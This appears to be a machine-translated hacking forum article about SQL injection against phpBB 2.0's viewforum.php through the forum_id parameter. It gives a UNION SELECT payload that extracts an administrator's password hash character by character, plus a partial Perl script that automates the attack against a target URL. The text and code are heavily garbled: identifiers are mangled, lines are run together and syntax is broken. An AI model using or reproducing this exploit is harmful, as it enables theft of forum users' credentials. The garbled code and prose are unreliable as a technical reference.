It is difficult to see a complete article on PHP injection and use code, so I have repeated mySQL and PHP a few weeks. Let's talk about my tie, I hope I can throw brick!
I believe that everyone's injection of ASP is already very familiar, and the injection of PHP is more difficult than ASP, because PHP's magic_gpc option is really a headache, do not quit quotes in the injection, while PHP is more than MySQL, and MySQL function The shortcomings, from another perspective, it is necessary to prevent SQL NJECTION attacks to a certain extent, I will give an example here, I take PHPBB2.0 as an example:
There is a variable in viewforum.php without filtration:
IF (Isset ($ http_get_vars { $ forum_id = (isset ($ http_get_vars ($ Http_post_vars If it is ASP, I believe that many people will inject. If this forum_id specified forum does not exist, the $ result will be empty, so return to the could not obtain forums information, then the following code cannot be executed / / // if the query doesn't returniful rows this isn't a valid forum. Inform // the user. //Iff (! ($ Forum_row = db-> sql_fetchrow ($ result))) {message_die (General_MESSAGE , 'Forum_not_exist';} /// START session management // USERDATA = session_pagestart ($ USER_IP, $ Forum_ID) / ******************************* *********** The key is the line of the star, here is a function session_pagestart ($ user_ip, $ thispage_id), which is a function defined in session.php, because the code is too Long, it is not fully posted, interested in seeing, the key is that this function also calls session_begin (), the function calls as followsion_begin ($ user_id, $ user_ip, $ Thispage_id, TRUE)), is also defined in this document, including the following code $ sql = "UPDATE". SESSIONS_TABLE. "SET session_user_id = $ user_id, session_start = $ current_time, session_time = $ current_time, session_page = $ page_id , session_logged_in = $ login where session_id = '". $ session_id."' and session_ip = '$ user_ip' "; if (! ($ result = $ db-> sql_query ($ sql)) ││! $ db-> sql_aftructedRows ()) {$ session_id = md5 (uniqid ($ user_ip)); $ SQL = "INSERT INTO". Sessions_Table. "(Session_ID, session_user_id, session_start, session_time, session_ip, session_page, Session_logged_in) Values ('$ session_id', $ usr_id, $ current_time, $ current_time, '$ usr_ip', $ page_id, $ login); if (! ($ result = $ db-> sql_query) { Message_die (critical_error, 'error create new session: session_begin', '', __LINE__, __File__, $ SQL); Here, there is a session_page defined in MySQL, his 値 $ page_id, that is, $ forum_id, if inserted is not shaping, it will report an error, it will appear Error Creating new session: Sensions_begin's prompt, so I have to refer to this $ forum_id is important, so I specified it as: -1% 20Union% 20Select% 201, 1, 1, 1, 1, 1, 1, 1 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1% 20From% 20PHPBB_USERS% 20where% 20User_ID = 2% 20and% 20ORD (Substring (user_password, 1, 1)))) = 57, there is no quotation! Although specified is a non-existing Forum_ID but he returns the query result can not be empty, this is the ASCII code value of the first password of the user_id 2 user is 57, If there is a problem in the first paragraph in the article in the article, it is not empty. So the Ession_pagestart has a problem with the problem. Insert is not an integer, it will be wrong, so I will show Error Creating New session: session_begin, Indicates that you guess the first place, other bit is similar. If there is no such error message, I think that even if it is successful, it is difficult to judge whether it has succeeded. It seems that the error message is also very helpful. Analysis is here, here is attached to a test code, this code as long as the code is slightly modified It can be applied to other similar guessing MD5 passwords. Here I use the English version of the return condition, Chinese and other languages as long as the return condition is changed. User; ua = new lwp :: useERAGENT; print "******************************** ***** / n "; Print" phpbb viewforum.php Exp / n "; Print" Code by PinKeyes / N "; Print" www.icehack.com/n "; print" ******** **************** / N "; Print" please enter the weak file's url: / n "; Print" EG http://192.168.1.4/phpbb2/viewforum.php/ N "; $ adj = 20User_id = $ u% 20And% 20ORD (Substring (user_password, $ j, 1)) = $ PINK [$ I] "; $ request = http :: remove-> new ('get'," $ url "); $ Response = $ uA-> Request ($ request); IF ($ response-> is_success) {if ($ response-> content = ~ / error create new session /) {$ PWD. = Chr ($ PINK [$ I]); Print "$ PWD / N"; }}}}}} f ($ PWD NE ") {Print" SuccessFully, THE Password IS $ PWD, Good Luck / N ";} else {print" Bad Luck, Work Failed! / N "; As for the recent PHPB2.0.6 Search.php problem Utilization, only the above code is slightly modified, if you want to correct, please correct it at www.icehack.com. text
